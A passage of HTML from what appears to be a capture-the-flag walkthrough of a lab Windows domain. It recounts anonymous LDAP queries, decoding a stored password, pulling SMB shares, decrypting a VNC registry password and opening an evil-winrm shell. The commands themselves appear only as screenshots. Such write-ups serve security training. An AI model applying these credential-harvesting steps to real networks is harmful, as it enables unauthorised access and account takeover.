url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6klEQVR42i2OQXKCQBQFOQvqoAKDCM4QEBhASmMUNKlyk/ufozNgFl3136Lff84yvrJKHrhRT6xOmO5J3Yw0/ZNjfWOXGBbiwGqtEVvNyjvMeWnzm4zFP67FCdWVUF1Iy5GiHuj6H/Lyi8oMJMUZ1d4JsxPrqER83PGygTi7EMY1W1ki981MsDPIpMXZJR1BoGm7kbod7cIHcdpx0D2h7mi+f0maG548slADvnmR9y908Ul2vM5lvn3my2q+nUlW+sQ+bQmsFEQVYpOxCXK8jSaalvg5rkgRQuFvC2T8lidX7o1da2xpNa/+AxNTg2d628efAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list shares access denied" title="" src="/static/4d25353d0586659317f1599a5edb60a6/50637/list-shares-access-denied.png" srcset="/static/4d25353d0586659317f1599a5edb60a6/dda05/list-shares-access-denied.png 158w, /static/4d25353d0586659317f1599a5edb60a6/679a3/list-shares-access-denied.png 315w, /static/4d25353d0586659317f1599a5edb60a6/50637/list-shares-access-denied.png 630w, /static/4d25353d0586659317f1599a5edb60a6/7c5b2/list-shares-access-denied.png 728w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Anonymous LDAP authentication was enabled, so I used <code class="language-text">ldapsearch</code> to query LDAP and view AD info:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2d31bb746ccecc1ec72006b16d10d935/a579b/ldapsearch.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 8.227848101265824%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfklEQVR42k3MSw6CMACEYQ4jrRRSWuXRRgjhUXRj1Jhw/5v8VhbGxZdJJplJZPVEmJFuuBOuG1N4E24b4/Kinx4cVEuq3M8xd2SR+ksZe1l0KN2TSDMhiguneqZ2K+dmoWrXKGCbmTQOvkTud4X2lJE1Hq0dpvT7cVYO2HrmA5qqQMQWlGA+AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ldapsearch" title="" src="/static/2d31bb746ccecc1ec72006b16d10d935/50637/ldapsearch.png" srcset="/static/2d31bb746ccecc1ec72006b16d10d935/dda05/ldapsearch.png 158w, /static/2d31bb746ccecc1ec72006b16d10d935/679a3/ldapsearch.png 315w, /static/2d31bb746ccecc1ec72006b16d10d935/50637/ldapsearch.png 630w, /static/2d31bb746ccecc1ec72006b16d10d935/a579b/ldapsearch.png 724w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After looking through the output, I found a base64 encoded password in the <code class="language-text">cascadeLegacyPwd</code> attribute for the <code class="language-text">r.thompson</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 626px; " > <a class="gatsby-resp-image-link" href="/static/7c8448927efcad399d9c6bdb8d19a49f/2c45b/r-thompson-cascadeLegacyPwd.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABa0lEQVR42n2SXW7DIBCEfY8m/gUDBmMMdlzbSdMqUu9/o+mCW/WlzcOnXYEY7eyQcc7RKAs5buDGQ/gdTHZwtsO+eJhO4uV0xumc4xzJD/K8QF4UR/3uCyITQqDpHMR0R0tikqq+3OHDSILE5DD3ClPfwWuZMIKjrio0kfqAEWVZIqvrBlJpGDtC6SFNy7iA4Q06Ij62qoWVAr1sUx9rRNPdwXHOmgpZwxgkCQ1hhXYzeD8l68zOYEJiIetxupkIRiWhZLn4sfzbJ8ttK1CrAW3c4bBAze8Q1Itwg+gM7sFi9xbLYAgNT6I/j/8iCTJNdsM1BZME/ZZ2KaTBh+/xRlzHWG2atHgmKMhWqXowv4KNRKCUKZx6uEC6AWEJieUyYqXUJe0s2vxXUNKEk+ixug3buGMdXrH5Gzbt8PATHtOCT+coFEqWs5Tk0wklfRtXlJgYCTOZCDXHXJW4UmprTbUqwE+n9BefiUXBL6TYCHadcuMzAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="r.thompson cascadeLegacyPwd" title="" src="/static/7c8448927efcad399d9c6bdb8d19a49f/2c45b/r-thompson-cascadeLegacyPwd.png" srcset="/static/7c8448927efcad399d9c6bdb8d19a49f/dda05/r-thompson-cascadeLegacyPwd.png 158w, /static/7c8448927efcad399d9c6bdb8d19a49f/679a3/r-thompson-cascadeLegacyPwd.png 315w, /static/7c8448927efcad399d9c6bdb8d19a49f/2c45b/r-thompson-cascadeLegacyPwd.png 626w" sizes="(max-width: 626px) 100vw, 626px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Decoded the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 343px; " > <a class="gatsby-resp-image-link" href="/static/5aa308fe8c67042552e5a2619328a67b/1d916/decode-r-thompson-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 19.62025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVR42h2PXU/CMABF90c0MNa1gOBG165TWCETCB9CFNFEMEZ98P//gmPl4eQ+ndx7o7Rbovol8nZBOlwisg2dkPFgTtJzdIdj3HhL4ZbYaoGxDdPZjtpvsW5BNppR3a+4GXk60hAp7ZFmhahOgTPKHsknJ6r6GVPW+EnD+e2D4+HEev/J7vjL5vDN+vDD8vHMav/O08sXdrKmnRZEuX3A+FfKOqzwO5TS6EGOLwrGusRklrtc05M5Vx1Dq1cTZw1xPqelKuK+4zrOaSeaRFmikZ7iXIMLd5ybI7suNAUxMbSFIU7/04Y7JSIIQhYkQl8Q0l5IgyNUSSItf6CHg38kMTaGAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="decode r.thompson password" title="" src="/static/5aa308fe8c67042552e5a2619328a67b/1d916/decode-r-thompson-password.png" srcset="/static/5aa308fe8c67042552e5a2619328a67b/dda05/decode-r-thompson-password.png 158w, /static/5aa308fe8c67042552e5a2619328a67b/679a3/decode-r-thompson-password.png 315w, /static/5aa308fe8c67042552e5a2619328a67b/1d916/decode-r-thompson-password.png 343w" sizes="(max-width: 343px) 100vw, 343px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I was now able to access some SMB shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/df34e1e3633789e648c8e97d2da76e72/bf337/r-thompson-list-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACIUlEQVR42j2S2U7jQBBF/SkkkHjfe7NjO8TZQSEzgJBGmv//jTu37IGHltWxc+rcqvJW1RErfcfKfSI2Z4ynd+zPnzhevtCPd9j2hLJwSFKLVehQ5i3vGwRZj7B6hp9usIpbrBM+Qw2v6L6Q6wMqd0JHwDC+wXUvcO0VOX8z13fo8RWJ3mHhPpCOf+C2N+T1iFQfUdjT9P/CnJAUHTy/+UtygzjboN/dCLyj1HsUao+k3GI4/oYi/NG38OsD1PCGtr/Bbl7Q9Re4Zk/4lucZRW7hBfoXHtYWQdJAuyNMe2alAXHOSIxj2wtK2izXBllsUGcGT4HDmvFN6dDUGkmiEfJdlVXwUn1FxMs6crTaoVQjorSjccciLSpzQFpssaRhnhoMtSJwhvohRWKLp2jusaloWDZ3FKwaxGJ4mowEIJYR22A3VxbZY8EUFb/baQHa6Sx9h2UwnzBhQYmc2RuqXJQdatoINMmH6UhkaYEMQIBSuKCl2K4ITAiR6AKOaJpnYth+IIkM/KiBo03DCWcchhyJ3favU+wH9tCWGoOaDQXoeA+j2TQlXOUGnnMX6FyhqQyUHlFxBQQUpxwKd6u2hwkuVhntRqOm5yOBTSVAgwXfiXmvuIfKXtGWCjXpMhCJHXNpBSpAZY/IKgGaeSjfhhyIAGSgi//FxNir+bGlYctLlndIZLqMH3D7pQ3fvXwkMIo1C+ufyGWmOem5pxJdevwPz1RiJFRcei0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="r.thompson list shares" title="" src="/static/df34e1e3633789e648c8e97d2da76e72/50637/r-thompson-list-shares.png" srcset="/static/df34e1e3633789e648c8e97d2da76e72/dda05/r-thompson-list-shares.png 158w, /static/df34e1e3633789e648c8e97d2da76e72/679a3/r-thompson-list-shares.png 315w, /static/df34e1e3633789e648c8e97d2da76e72/50637/r-thompson-list-shares.png 630w, /static/df34e1e3633789e648c8e97d2da76e72/bf337/r-thompson-list-shares.png 725w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Downloaded the shares:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7e2a25a64260ceec89dcf4e3e2e6666f/bf337/r-thompson-download-shares.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAADEklEQVR42j1U147bSBDkh6wXtrKYMylymJMkSvJm+zLWwB0O9//vdTVjww8NScNiTXV1tTQ96rFLbljFn7H1OxzKM/L6irL7jFgcYXsFPDuGbSfYGAkcfresGBs7gxPWcPyS5zzzBCy/gOZXX2Dz0HRzJPkRUXYksGU10P0KYXOBKyZsHYFPwQl6fkNwGIgXsIMKLnEmyWyW6aTQjPZP6NkV4WFCOz2jP70iESdEhxFO3EGcXxDUMxXlWCQz7PYVaXVDlE/w+TwVI2tCnI0IkhbacvyG5fgOPzujGZ8UoRe1bKGC4RQQ5QVB3GOx8bEyGxjBhKo5Q9QX1VGcn7AnbmsVWJs5tI/FG+6zZ2wsgSgdeNOkyGTpdoG0OMOlkuUuwtLusPNHhUvEDC+Z4CYDrKDBjliDNmgfq99wn7+qg4RkBxLYfk3CWhFm5czWeiw3IZZmBz04QlRX4qRNR5LST2LtsMN6F0BbDe+4L3/FzikJOikChzdKsw2e5dWFhMN3QruFnc7IicnKm1J5oCVRdmIXPSwOVrParzCbN/jpyJtnFA0Np9Ionehdh5DnUu1qG2NFW6xogEc1bthjawr6VzIRHQLiTbeEZndfYVQcBFXImwtmMCJJVsyc2qAuSGi8xygtdcYrmNRzSbjnIDZGzu5oF/Gm31Dh+AfM7pcfCq9o+kdmSg6Et1u5ellasNpyKAa9ik5qKEEyqnLlYlD5jvgtP7UPp/9wN/wD3a3RdA9oh2cEBAVJzy2o0E/MnTjTwwALm+q4CNKaqntE3T/xGT0PJWmBxS6Bdjf9i7v+b+heowi78QV+1KmS0emmF0Zn/kkYVm8oJGH7yMFcsNEzpTQVF6x23JRN+Ya1eGFbLQ5Mf06Q9Mvjb9m64JRd6Z9smcG2Iulno4YlrVjvUzWMmJPey5bX/TuWze+KsOTLVfugNkOWwzw2wxNf/h6bBXPo5w8om6vaeTksmVHTragu4aUxtPvuGz7Uf2FvlyScCb7BlTlkmYxE1fJfh3suW165JCwf1TqK+sYiMcOdFRelWCr8H09t9Z9VQPaHAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="r.thompson download shares" title="" src="/static/7e2a25a64260ceec89dcf4e3e2e6666f/50637/r-thompson-download-shares.png" srcset="/static/7e2a25a64260ceec89dcf4e3e2e6666f/dda05/r-thompson-download-shares.png 158w, /static/7e2a25a64260ceec89dcf4e3e2e6666f/679a3/r-thompson-download-shares.png 315w, /static/7e2a25a64260ceec89dcf4e3e2e6666f/50637/r-thompson-download-shares.png 630w, /static/7e2a25a64260ceec89dcf4e3e2e6666f/bf337/r-thompson-download-shares.png 725w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Files within the <code class="language-text">Data</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 530px; " > <a class="gatsby-resp-image-link" href="/static/02bb634dcb6d65d9ccfbfc08700dceb5/eb8fc/data-share.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABrklEQVR42mWS6XKjMBCEeZQtGwSCcErixuAzXsfO5VR2q/b9n6N3JDBxdn98NQNCrZ4WFktbsPIFrPqEk1/hZHsEckDZn9FuntHvXlGvqd++oKO+2VzQrC+oiLJ/orULhsO7WWdxA8tLViRygBOtYHOJpacIiYXu/YJqbuqtt4Nifr5/f+stL6wR5o/g8gg7+wlXPYEVb2DqGc5DTVSmsnDEDsr/BO+xFuQoEh2NSaM2H5DdGWl9gmjPiNXakBRbZNWB2IMn3TdHI+WMtaTFUAxIqiP8+gNueaV6RdT/Aa+ob3+DqyO8kDZoIR2HxhVENuIJw5IrEnQV/LhDRJfzQKEG1TuSfAvVnJAWB0OstsQGtnbD79EH5CZ3cwDLSNCMPMCLe9jpCb7YIxY9MhJN5AYu5ffDEWajPYvQxblyFpkht5b+iFHQgdghoMvgxStl+Qt+0iOgvHjUQF+cnmRBIksS+eL2V6jJpRwFzcn0wqEMOI2f6BHlGim5DLOeHA+zw5HpEqZ9JkcnJZcpLD2uqh8hyr2pftQiTFcQ+W7KJ/9HbDKgR2apGXV0qr8r8RcKNDs8RGyNJQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Data share" title="" src="/static/02bb634dcb6d65d9ccfbfc08700dceb5/eb8fc/data-share.png" srcset="/static/02bb634dcb6d65d9ccfbfc08700dceb5/dda05/data-share.png 158w, /static/02bb634dcb6d65d9ccfbfc08700dceb5/679a3/data-share.png 315w, /static/02bb634dcb6d65d9ccfbfc08700dceb5/eb8fc/data-share.png 530w" sizes="(max-width: 530px) 100vw, 530px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The email archive <code class="language-text">Meeting_Notes_June_2018.html</code> mentioned that a temporary account was used for tasks related to network migration, but more notably, the password used for <code class="language-text">TempAdmin</code> was the same as the <code class="language-text">administrator</code> account:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5d78e1a5cabc053c6d2a5d6b0b2f4345/5afa3/email-archive.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.64556962025317%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAABcklEQVR42q2UeYvCQAzF5/t/N4WiePzhfeBZra1HWzHyy/KgXXfZFRx4TI5J8tLJNCwWC9vv98Z6PB6mdTgcbLVa2W63s3dW2G63dr/fXxxxHNt8PrfNZlMr9GfC5XJp1+v1xXE6nWy9XntCWBZF8b+Es9nMACyqgDkMaftyubz4f0O43W4/MuQz5HnuzN5qmWTn89mSJLE0Tb1VgJ5lWU3nojiDLODDdjwenUCgHTl1WAmquoLYBcVRmGKQC7REUowAGcbIBMkmtvKxY5evLMuvlplDbppKMBA7ZEYHECAdP7KYS9cUBCpx8HsrVdYKlK5vLabITAVxYTAYWKfTcURRZK1Wy3fQbrdr9n6/77Zms2ndbtd6vZ41Gg23kwemPoco4/HYhsOh79hGo5FNp1OfRexVHXkymbjOs62OXYC+3iy0tfMZkHktBGmvnmHndmlZsxpIRkUqw4wg5gnoFjX8QDp+zXCNoX14+d+Gqp9K+AQkadChu+OgUgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="email archive" title="" src="/static/5d78e1a5cabc053c6d2a5d6b0b2f4345/50637/email-archive.png" srcset="/static/5d78e1a5cabc053c6d2a5d6b0b2f4345/dda05/email-archive.png 158w, /static/5d78e1a5cabc053c6d2a5d6b0b2f4345/679a3/email-archive.png 315w, /static/5d78e1a5cabc053c6d2a5d6b0b2f4345/50637/email-archive.png 630w, /static/5d78e1a5cabc053c6d2a5d6b0b2f4345/5afa3/email-archive.png 726w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The registry file <code class="language-text">VNC Install.reg</code> within the <code class="language-text">s.smith</code> folder contained an encrypted password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 533px; " > <a class="gatsby-resp-image-link" href="/static/edda97d57d10209db25b2a98a72a315f/05dcd/vnc-install-reg.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 146.8354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAADI0lEQVR42oWV2VIiQRBF+Q1lbbpbZRcQERBljcCQmTFi/v9bau5JOhlWfaio3vLUzbVzURSFJElCrVYLnU4n1Ot12xuNhl23Wq1wf39v1zzjO1a5XA6VSuVs5SoCRtWqDGqh3W7vDbl+fHw0IAdwzXPuWVXZFIvFUCqVDO4rV6lEehmHh4cHM2BHQbPZNBC7Qx3IYXzHiuP4CJqLMoUoeHl5CcPhMDw9PYVut2vGQBzk7h4uwnUOjKpS0DYYUBbAXq9nyp6fn8NoNDIArmJzc3MT8vn8kbt7IC635BpGQMfj8dHuazKZhPl8HhaLhR3CAWcxjOMkVONdlt0QcL/fN4W4jzH30+nUlicvTdNzYJKkWQw75urr66vtqAECnPvVahW2263dk91LGc6Ayc5lBR0XUXMYR9RQh54YsnpYg2fAWEAUYog7uOmZBooiKgBFt7e3tp9CjhUqDsSxrdM9hsAAofb9/d3CwEEsYlcoFK4DXSFZ9tjh+mAwsBiyOAAo8PV6bfeX4rdPSjX+H8PDWkQhxsB5zv1sNrPl/Xye5TS1sulkMXRD4Kd1yCHA8WKz2dh+1immUFluKDZ84GWCq15/PEMV1z6FAJHx00wrhjsgH7mrXtyoIXYc5APBJw+wSxnfuZzV4dvbmwE9y+wsQuHPeA/4Wvnsk0LZHLpsSZFC4thTgeMuyvGE/q9crcMM2EChyqIvJUNiSGYF51lPsI6gXe2UWZ7Wu17YdyERcKI63AiwEGiptZaaqeI1UzHPBfot8JemzFgHd6lbqSxeA94JuFJc/gj0S8afUvMp0FbXH0rAl7L9V4d9UFpSuNS3Q2W3QE9fSkqkpLSlZqwY4u6IIcH8U4YHgs2lbLlchrpKpixQSYbFq52SZZnC9knD7jU4ZFpnLckI4/2PwwEgPyPqDgMyC4x7nzpMaaBkmM64NLr2MWTaUA4UMQsgIG89P8g7iCEB/PLETndl0zz5p/g1howt7yCUMnFohB87xY1Q5HH0P57D6WneX3U5xWUVNwoxcKjD6GHvHlz08V/+tlNsONT2rhI/YoohMfKf0nfZdeA/2vdsRoN5FhwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="VNC install registry" title="" src="/static/edda97d57d10209db25b2a98a72a315f/05dcd/vnc-install-reg.png" srcset="/static/edda97d57d10209db25b2a98a72a315f/dda05/vnc-install-reg.png 158w, /static/edda97d57d10209db25b2a98a72a315f/679a3/vnc-install-reg.png 315w, /static/edda97d57d10209db25b2a98a72a315f/05dcd/vnc-install-reg.png 533w" sizes="(max-width: 533px) 100vw, 533px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There's a command which can be found <a href="https://github.com/billchaison/VNCDecrypt" target="_blank">here</a> that uses native Linux tools to decrypt VNC passwords:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ff49767e3b0fea74124feb52160772bf/7c5b2/decrypt-s-smith-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAuUlEQVR42i2Na46CQBCEuYoK44wMKiogDKz4CA81MRrX7N7/IN82uj8q1V1dVe0F6xs2vZKVHU3/4tQ+ObYv3P5OvrugopLACqIKbR3KFoyFR2bLSNgPc/E4grBAi9fbup6kaDg2D/rrL935Rwq/ifMetajRSYtOO6ZxzWwol7CbO+pFyWFVYYdCmQNhM6/wlvEOI0soxpl8H0LR8gst2lgl+DrDN6lwwmSavrExGU5KKskY9dH8/9sfuZVhESYWa4oAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="decrypt s.smith password" title="" src="/static/ff49767e3b0fea74124feb52160772bf/50637/decrypt-s-smith-password.png" srcset="/static/ff49767e3b0fea74124feb52160772bf/dda05/decrypt-s-smith-password.png 158w, /static/ff49767e3b0fea74124feb52160772bf/679a3/decrypt-s-smith-password.png 315w, /static/ff49767e3b0fea74124feb52160772bf/50637/decrypt-s-smith-password.png 630w, /static/ff49767e3b0fea74124feb52160772bf/7c5b2/decrypt-s-smith-password.png 728w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The credentials authenticated and <code class="language-text">evil-winrm</code> was able to make a connection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 541px; " > <a class="gatsby-resp-image-link" href="/static/562d8a7f362db8d740f34bed512b2ed5/ca16d/s-smith-evil-winrm.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 61.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACLElEQVR42m1S23KbMBT0nzSxAYFAgLkIgcHGBl8yTprbdNrp9KX//xHbldJMJ20fdo6RzLKXswizHkI/wjdfEXTf4RdHNMMF908/cL5+w9PrT0znL5jPr9gdrgilhh+3iGIDpQzixMALG8I4LAI1IFifEOQTRMmZ7hCvdyjNCet6QsUZ51tItUGx7hyJn2wQqxbrzCBL/yL0ki28ZISXzlhxruIdltEGN4HBjVfi06rALaf7TdwGNZbErc8pGocPhJIkMt5CJXt+7YC8nJBUF2TNPZL6irS+g6pOyNtHnj1A6Xuk5hFpdYYfapLoj4Ql7fR6wqbco69GDN2IhGdZ+TZT2s94t64OyIo9FJ9TThtHpHoEsv1N+Ea60LJBn7QYpcGsGsydQd2csJ+e0W7uMOw/OxyOL9jPL2iHqyMUSefyrdszQma6EvqNUIgKIiD8EpFfQMoKYdy5EuyMOC1kajE4VX5kHME7/ihssFiSLMkHFHpGTluSrWfF6Cwm2ZaZWnsH3k/O+v9IPhAKWrU7FbndahHw64K5SCqxKh3S3qkUvPejxuUmqN7iH0JtjlBc7qVXwKPalV/hhquS5juXoVVa1rNr1LqxxI09Zyllc3QrZPGuelHSTkU7vqgRhDUKEpjuwgKe2fCIrr9iPDwhYvD2RavQxmPL6ccHaP7XboMtxhEmtKOywRFahZLt1XxBm7Ozb/OsqCSkzZWoHexKVXRmG9bthS4mt1K2rF/fun7B/1KykgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="s.smith evil-winrm shell" title="" src="/static/562d8a7f362db8d740f34bed512b2ed5/ca16d/s-smith-evil-winrm.png" srcset="/static/562d8a7f362db8d740f34bed512b2ed5/dda05/s-smith-evil-winrm.png 158w, /static/562d8a7f362db8d740f34bed512b2ed5/679a3/s-smith-evil-winrm.png 315w, /static/562d8a7f362db8d740f34bed512b2ed5/ca16d/s-smith-evil-winrm.png 541w" sizes="(max-width: 541px) 100vw, 541px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">s.smith</code> was a member of the <code class="language-text">Audit Share</code> group:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 501px; " > <a class="gatsby-resp-image-link" href="/static/8004672104edab05b9d517d6aa903f18/09eb0/net-user-s-smith.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 88.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC60lEQVR42mVU2XLaQBDUp9gcQgIhdB8IdHGZ23YqScVJVf7/Kybdg6EgfphaSbvb090zIyN0UgnsRDInk9SOZRpEEsaVxNMXSaYb8ZNW13y+k1l9kjjfiBcv8H0hUb4WN6wlzFaSFC/Sw32jWr4KY3f6EHOUybMZSc9KbtEdxHp5+fJdyvZVMgAPnCkup9IfZrr2QKgziPSskc+3UjZHmSDT0J2JzcN3gD0r1egOEr1MsK5FgPjyjXt354yaDBdnlbQ//xYfcjo3lqk898EwXko22+lelK1VdlpsJUiWMhhNb8AKmEJ72Z4lTJdSVHtcWCl1AvZtAkYKMi0PeM9UJlfzc70C3QDVXIB4YYPMa7BoxR5PP0EvUofuXBKwcry5MrIg2x4XMhzPAZw/ArKCZXtSCSEkJACdAJyAZED5blCD/UHS2Va8qMV+C0UrPW87xaPkevkmp/e/0q7epcHz/vxH+I2SCPbcCyXC5e3hF0CP6ie9pI8Mezx7BMzg4aw+wPStsiRYih50/Vpt6JooClh5UaMXKZHJLmv+1UPSZkaulEMfyYieTSCV0h2vVM+e+yFYx7e4Z3YDnMEbBqtdlDtxJnMJkGAMEMq9Sp43Ry0Yk9NT+sgCfQFcrN/h35s0i1dZbb4pUAet0kP2PicFTNjslMwqjyaMUoMAHfORpZEXG4nQOlVz0tVBi5AVgQjKdQCvPEwSmdIG16+0E4JkhSTVA6jh46CPzQTN64KBPcr1koW1a14AR7jkRguxwd4CQwsjemVp/d82AQpBZl5QCcFDvGeosoPDfZUUS4iCJEjgdH2ZmKEM+4E89QKdIu7fT4wxQVYXQZYBfIoxgkzCqtPPp44vK7eQD1hyxt7P5iCnuNHzZMi+ZHdcWRoJxi5FqxCIzwl8KvCjiPmcbcRE9hiVPW5/SIUfRDPfSwNwVvxapAcPCZZDYo3xK/ArmwGsxR+owGU2PQvBicjxcxiBsQnpjM6n3OvMXwH/AbJDRSu0KmW4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="net user s.smith" title="" src="/static/8004672104edab05b9d517d6aa903f18/09eb0/net-user-s-smith.png" srcset="/static/8004672104edab05b9d517d6aa903f18/dda05/net-user-s-smith.png 158w, /static/8004672104edab05b9d517d6aa903f18/679a3/net-user-s-smith.png 315w, /static/8004672104edab05b9d517d6aa903f18/09eb0/net-user-s-smith.png 501w" sizes="(max-width: 501px) 100vw, 501px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This granted access to the <code class="language-text">Audit</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/df90a7408c0a17e3b2004a4d3b891d66/5afa3/s-smith-list-shares.png" style="display: block" target="_blank" rel="noopener" > <span 